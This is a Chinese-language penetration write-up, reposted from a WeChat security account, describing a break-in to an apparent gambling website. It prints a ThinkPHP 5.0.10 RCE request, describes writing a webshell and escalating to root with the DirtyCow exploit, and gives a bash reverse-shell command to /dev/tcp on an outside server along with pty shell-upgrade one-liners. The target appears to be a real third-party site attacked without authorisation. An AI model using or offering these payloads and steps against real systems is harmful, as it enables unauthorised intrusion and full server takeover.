正文
前几天搜集了一下某湾资产发现一个bc平台,看起来像是有段时间了。
主页面全无入手点后,fofa查了一下ip开始挨个排查ip,8090端口打开没有啥服务但是一看这个图标就想到了thinkphp。
云溪测了一下确定是tp和宝塔现在就有两个点可以进行探测,开始挨个排查thinkphp的历史漏洞。
利用工具进行探测的时候发现是存在这个漏洞的手工复习又不存在了
存在ThinkPHP 5.0.10 construct RCE
?s=index%20Post:%20_method=__construct&method=get&filter[]=phpinfo&get[]=-1
上一个利用失败后幸好还有一个差不多的版本的rce可以尝试一下,利用成功写shell开始做内网。
开始信息收集,Linux系统,非root权限,ifconfig看了一下ip没有内网环境,也不用做横向其他的玩意。
尝试利用suid和sudo提权
sudo失败
suid也失败了
上传 LES对系统进行扫描后发现脏牛比较靠谱剩下的利用价值不大
下载c文件
https://github.com/FireFart/dirtycow
上传后进行编译运行
看一眼etc/passwd看一下有没有用户生成,成功生成
su切换账户失败了,终端类型不对,不能利用su
转化一下shell类型
python -c 'import pty; pty.spawn("/bin/sh")'
python -c 'import pty; pty.spawn("/bin/bash")'
切换失败了,有人说可能是权限太小的问题, 我觉得可能不对,也可能是shell类型的原因
把shell反弹到公网服务器上
蚁剑使用bash反弹shell
bash -c 'exec bash -i &>/dev/tcp/1111111111111111/5555 <&1'
服务端nc接收shell
nc接收后查看权限依旧为www
使用 python -c 'import pty; pty.spawn("/bin/sh")' 会出现,这不是报错是正常的
然后政策切换账户成功 root权限
后面利用root权限进行信息收集的时候发现存在一个PHPunit其中也有一个rce上去就是root权限,手太快了搞这一圈
欢迎关注听风安全,分享更多安全技术~
原文始发于微信公众号(听风安全):【渗透实例】记一次BC站从rce到提权
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论